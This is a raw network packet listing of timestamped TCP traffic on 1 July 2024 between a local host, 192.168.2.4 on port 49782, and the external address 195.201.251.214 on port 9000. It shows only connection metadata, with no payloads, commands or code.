Jul 1, 2024 09:16:32.821942091 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.821966887 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.823232889 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.823266983 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.823280096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.823288918 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.823312998 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.823323965 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.823339939 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.823353052 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.823389053 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.823421001 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.823431969 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.823441982 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.823471069 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.823483944 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.824415922 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824454069 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824466944 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824477911 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.824500084 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.824531078 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824542999 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824553967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824561119 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.824567080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824578047 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.824579000 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824604988 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.824618101 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.824667931 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824680090 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824692011 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824703932 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824731112 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.824765921 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.824770927 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824783087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824795008 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.824816942 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.824841022 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.831695080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.831737995 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.831753016 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.831794977 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.831799030 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.831814051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.831830025 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.831835985 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.831845045 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.831855059 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.831876993 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.831882000 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.831967115 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832016945 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832030058 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832042933 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832056999 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832071066 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832082987 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832087040 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832122087 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832134962 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832153082 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832170963 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832190037 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832202911 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832212925 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832218885 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832231998 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832237959 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832262039 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832284927 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832309008 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832382917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832421064 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832472086 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832499981 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832518101 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832530975 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832540989 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832554102 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832561016 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832576990 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832585096 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832604885 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832613945 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832622051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832648039 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832664013 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832664013 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832683086 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.832689047 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832705021 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.832726002 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833138943 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833204985 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833245993 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833288908 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833303928 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833318949 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833332062 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833347082 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833379984 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833395004 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833409071 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833425045 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833456039 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833456039 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833477020 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833594084 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833636999 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833645105 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833659887 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833708048 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833739996 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833755016 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833770037 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833786964 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.833806038 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.833818913 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835195065 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835270882 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835273027 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835287094 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835319996 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835335016 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835372925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835386992 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835401058 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835414886 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835414886 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835441113 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835469007 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835645914 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835670948 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835688114 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835697889 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835711956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835716009 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835724115 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835728884 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835747004 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835748911 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835764885 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835767031 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835777044 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.835786104 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.835829020 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.839405060 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.839449883 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.839462042 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.839483976 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.839499950 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.839508057 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.839544058 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.839575052 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.839591980 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.839607000 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.839637995 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.839677095 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.852344036 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.852359056 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.852366924 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.852376938 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.852382898 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.852390051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.852494955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.852514982 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.852540970 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.853183031 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.853399038 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.887162924 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.887190104 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.887207985 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.887219906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.887237072 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.887248993 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.887248039 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.887267113 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.887279987 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.887316942 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.909135103 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.909163952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.909174919 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.909209967 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.909238100 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.909250021 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.909260988 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.909274101 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.909286022 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.909306049 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.909327984 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.911854982 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.911866903 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.911879063 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.911906004 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.911926031 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.911961079 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.911972046 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.911983013 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.911995888 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.912008047 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.912029028 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.912040949 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.914102077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.914113045 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.914129972 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.914158106 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.914190054 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.914208889 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.914221048 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.914232016 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.914243937 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.914261103 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.914289951 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915525913 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915539026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915549994 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915589094 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915589094 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915620089 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915631056 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915644884 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915656090 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915661097 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915678978 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915705919 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915729046 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915741920 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915752888 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915766001 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915770054 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915781021 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915790081 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915839911 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915858030 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915869951 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915880919 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.915906906 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.915925980 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.922322035 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.922372103 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.922435045 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.922543049 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.922554970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.922566891 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.922578096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.922594070 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.922611952 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923119068 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923137903 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923149109 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923166990 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923185110 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923206091 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923227072 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923238039 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923290968 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923290968 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923376083 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923387051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923398018 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923408985 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923420906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923427105 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923451900 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923526049 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923537970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923580885 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923676014 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923687935 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923698902 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923710108 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923721075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923727989 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923732042 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923743963 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923757076 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923760891 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923767090 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923773050 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923801899 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923922062 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923932076 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.923959017 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.923974991 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.924020052 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924038887 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924051046 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924076080 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.924093962 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.924134970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924146891 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924158096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924191952 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.924248934 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924335957 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924348116 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924384117 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.924398899 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924411058 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924422979 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924458981 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.924527884 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924568892 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.924669981 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.924710035 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.925710917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.925739050 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.925750017 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.925776958 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.925791979 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.925839901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.925852060 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.925904989 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.925935030 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.925945997 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.925956964 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.925992966 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.926158905 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.926203966 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.926212072 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.926222086 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.926261902 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.926268101 CEST	49782	9000	192.168.2.4	195.201.251.214
